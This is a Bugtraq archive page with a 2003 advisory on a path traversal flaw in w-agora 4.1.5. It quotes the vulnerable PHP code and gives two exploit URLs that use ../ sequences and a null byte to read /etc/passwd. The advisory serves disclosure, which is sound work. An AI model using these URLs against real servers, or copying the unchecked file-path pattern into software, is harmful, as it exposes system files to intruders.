Bugtraq mailing list archives
Bug in w-agora
From: sonyy () 2vias com ar
Date: Sun, 12 Jan 2003 12:03:12 -0300
======================= ==Shell Security Team== ======================= ============================== ====Advisory For W-agora====== ============================== - Product : w-agora - Tested version : version 4.1.5 - Website : http://www.w-agora.net - Discovery By Sonyy - Vendor Status: informed - Problem : A security vulnerability in W-agora The bug : ========== index.php if (empty($bn)) { # No forum selected -> default to 'site' configuration $site = empty($site) ? "agora" : $site; $cfg_file = "${cfg_dir}/site_${site}.${ext}"; $expnd = "all"; } else { $cfg_file = "${cfg_dir}/${bn}.${ext}"; } Exploit : ========= index.php http://www.w-agora.net/current/index.php?site=demos&bn=../../../../../../../../../../etc/passwd%00 And modules.php http://www.w-agora.net/current/modules.php?mod=fm&file=../../../../../../../../../../etc/passwd%00&bn=fm_d1 Any Question : ============== Sonyy --> Sonico60 () hotmail com
Current thread:
- Bug in w-agora sonyy (Jan 15)
- Re: Bug in w-agora Nicob (Jan 17)
- Re: Bug in w-agora Ian Clelland (Jan 21)
- Re: Bug in w-agora Nicob (Jan 17)